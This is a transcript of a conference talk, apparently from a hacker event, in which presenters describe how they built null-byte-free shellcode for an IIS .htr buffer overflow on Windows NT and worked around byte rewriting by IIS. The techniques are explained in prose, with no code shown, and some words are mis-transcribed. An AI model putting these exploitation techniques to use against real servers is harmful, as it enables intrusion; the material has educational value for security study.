Yeah, so now you can see my pointer. Okay, so what we do here is of course we can just put a zero in the register we want to zero so we subtract it from itself or another way that is found commonly in Intel code is to solve it to itself. This is done not only in shell code to zero on other occasions too because the code this code is encoded in two bytes and the move code needs at least four bytes for the zero constant so this is actually commonly found even in compilers generate code that's subtracted number from itself to get zero so most people have written assembly language code before know this trick so what we do here is we add this magic to the constant and inside it would have been better to use something else than one because there's quite a chance that the constant will contain zero again. This is the reason why there's a two because it happened. It happened to us. One zero, one zero, one zero, one zero one but then some constant has changed and the addition of those produced another zero at that position so we change it to two. So we had to we experienced quite some pain putting this code together. The next thing we have to do is we have to strip the dots from the messages so the file name can contain a dot and the message we want to put in the file can contain a dot so we put an exclamation mark or some other thing that doesn't really matter anyway and So what we do here is that we have to patch up the messages. In memory the message does contain not a dot but some exclamation mark and then we add code that over writes this with what we want to have in the place in the first place but couldn't put there because the exploit wouldn't work then. Now we just simply do the same. We have state in here that's sometimes not obvious. In this line we put a zero in EDI register then we put the same zero in EBX. Now we push EBX to get zero on the stack. Next thing we have to do is we want to push 128 but 128 contains lots of zeros too. So we do some arithmetic here. This is a way, this is again using tricky code. This looks like the one would actually be encoded with four bytes again but it isn't for historical reasons. So adding something to a register like this does not insert a zero on the code. This is something you don't really know but you can see it by looking at the disassembly and looking at the bytes in the code. So this is actually a valid way to get rid of the zero. We increment it by one now, ECX is one and we shift it left to seven times and then we get this number. So what we calculated it and the way we calculated it didn't introduce any zeros. There are some op codes that you can't use because the op codes contain zeros. Some of them are add, some forms of the add instruction. So sometimes if you want to add, you actually subtract a constant that you use as it's really, really tricky to read in the end but it's not so difficult once you get the point. Next thing we want to do is we want to push this crappy constant with some brand dead flag from one include file and we have to calculate it again of course. So first we push the two, just get the two by the same method we used here. Then we push the two zeros again, we did change EBX in the way and now we have to get this which is of course can be done the same way as here just by shifting and this number is small but the op code can only shift by at most 32. Because the birds are not bigger than that. So the op code does not contain three leading zeros here because it would make sense to encode such large shifts. That's why this is simply a byte and shifting by 30 does not introduce a further zero. Now we have to get the offset of string. And initially what we did is calculated the offset of temp three and pushed it on the stack so we have it later. You can see all this by just using a debugger on this code but those are the main tricks you use. The rest is just at some stage you get zero in some calculated distance between the message and the code. So this is just the same tricks all over again. Okay, well I guess you get the feeling what is going on there. We have to use a few tricks to avoid all the conditions we had before. There are dots, there are zeros and so on. Oh there's one more important trick. But, yeah well, this one. As I told you the offset is static. The address where we want to go to is static but we can't call it because that means we would have to encode the relative distance which we don't know because we don't know where we are so we have to calculate it. Another way is to put the value in the register and then call that register. I don't know why this is there because you don't need it most of the time. But this is a way to call fixed offset. Okay, so the first block you saw is exactly the same like in the previous file where there were just pushes, push zero, push zero, push 128 and so on and the last call of the actual function which creates the file and so on. We go to the next function which writes and the next function which closes and you might expect that we are finished then but no, the problem was that the ISS randomly changed our code in memory. So what happened was- This is actually not documented at all. It's not a single manual. We don't know the reason but what happened is you can take this assembly code, make it in binary form and check whether you match the conditions there. If there are no zeros, no dots and so on, you're finished. Actually, we have a theory. Yeah, we have a theory what happened because- Well, let me finish to say what happened was we had a binary code fulfilling all the requirements but when uploading to the server we could see in the debugger that some positions in the code were changed. Some bytes were, some new divides were introduced randomly. Others were erased. That wasn't really randomly, it was deterministic but there was no rule we could guess. And the theory we have is that NT stores the file name in Unicode and there's some translation on it but it's just a guess, we don't actually know but stuff like that can happen and you have no chance to find it unless you do the in three trick to get the debugger otherwise you don't even know what happened to you. So if you really want to do shell code on NT what you have to do is get the decent debugger there's no way around that. So the next thing we did was that we guessed it wouldn't work if we had slashes here because we have a slash here in the URL. You don't have an extension.htr which is used to trigger the event and we wanted to write a slash to the file so the text we want to write to the file was changed a little so we replaced slashes with this brace and we replaced dots with this exclamation mark and we exchanged spaces with this and we found incrementally ISS was changing different bytes and the exploit wouldn't even trigger and then we just guessed and replaced another byte and that's why the pattern we used to initially was just letters because letters are rarely changed. Actually we have never seen it but opcodes can be anything like the German umlaut yü some other code above 80 hex anything and that might also be viewable as unicode and then translated randomly. So you have to have a debugger and then you see that your code is changed and you look at the byte that was there before that was supposed to be there but isn't now and have to re-engineer your code to not have that byte there which is sometimes quite difficult because it was two instructions that triggered the byte. We found that it was not just one byte that could trigger the change but the same byte was not touched above that so it was really sequences of bytes that triggered these changes. This is probably unique to this exploit but we tell it to you so you know if it happens to you, it happened to us too. The changes were the same but they were not really understandable to us. So the problem is we now have a completely wrong string in memory we have to write a small piece of code that loops through the code that was easier than calculating the offsets again and introducing more zeros maybe so what we did was just write a small routine so we wrote the small routine that would reverse the changes we had to do. So this is one of the changes. This is just small assembly code that jumps through the string reads the byte compares it to the new values we wrote instead. Of course this code might have contained zeros or other prohibited characters again so you see why it took us 200 iterations to get the right code in the end. So when we called the first function we got the handle, the file handle back which is an integer and we stored it on the stack so now what we have now is we have to use that value as argument to the next call the write call so that NT knows in which file we want to write so what we do here is fix up the registers again and as you can see the zero one, zero one, zero two zero one pattern didn't suffice in this position so we added another 50, 50, 50, 50 and subtracted it again. This knob was introduced because otherwise the last byte of this and the first byte of this triggered one of those unicode conversions so the code actually does not more than the code you saw initially but it looks way more complicated. Next thing we do is we call the write function and we have to get the length of the message. Again this length is because the message is so small a number that contains three leading zeros so what we did here is that we moved zero into E, CX and this is some inter-idio synchricity that allows us to write the least significant byte and because we know it's zero we don't edit but we all add because I told you before one instance of the add instruction has an initial zero byte as the opcode so what we do here is all those bits and the result is, where was it? Here was it, the result is that we have actually string length of message in ECX and can push it. Now the same thing we did before Maybe a minute. Another thing you can imagine pure desperation in us when we see the code looks correct doesn't contain any zeros but is still rewritten as in this case where this offset of the NT function actually contained one byte that would trigger one of those unicode things and we couldn't simply change it because this offset is static you can change it so what we did is we inserted one instruction that doesn't do anything. EAX is zero in this case and soaring with zero doesn't do anything but this instruction inserts two bytes and made that rewriting go away in this case. Again the same thing, of course, sore and or are the same but I said a little different code is more interesting so this again does nothing and but we have to get zero on the stack again we want the process to exit and this is the last thing that this process does exit process never returns so we can just put those numbers here. Imagine our surprise when we found out that these were rewritten with a single backslash what IIS did internally is convert the slashes to backslashes because that is the path name conversion convention under NT and MS-DOS so what it did was first convert our code to contain backslashes and then it fused more than one backslash into one so not only did it change the code but it made the offsets wrong which we calculated on the basis that two slashes here. Yeah imagine you have the whole stuff in binary form you find some strings there and there are two slashes which are convert to backslashes two of them and then stripped to one, just one and then but then we don't have a way that URL anymore in the file we want. Unfortunately we don't have an NT server here for security reasons obviously so we can show you this code but we are going to put it on the FTP server and then you can try it yourself. You will need NRsum to encode this. Should work out of the box. Actually this is just one part because we found a wrapper on the internet some guy had written in a generic exploit so to speak that would allow us to specify just the code that should be executed and get rid of the calculating the offsets the size of the buffer which bytes you have to actually override so we had a convenient wrapper that would allow us to specify just the code that should be executed but as you can see it was still we thought it would be a matter of a few minutes. We were wrong. So this wrapper is not trivial to write but if you know the trick with the pattern that we showed you initially it's not that difficult. Well the wrapper only opens a socket and writes this stuff together with the way let's HTTP protocol header to the IAS server. You need some way to say the server the code. Okay so that's it, that's it. Thank you.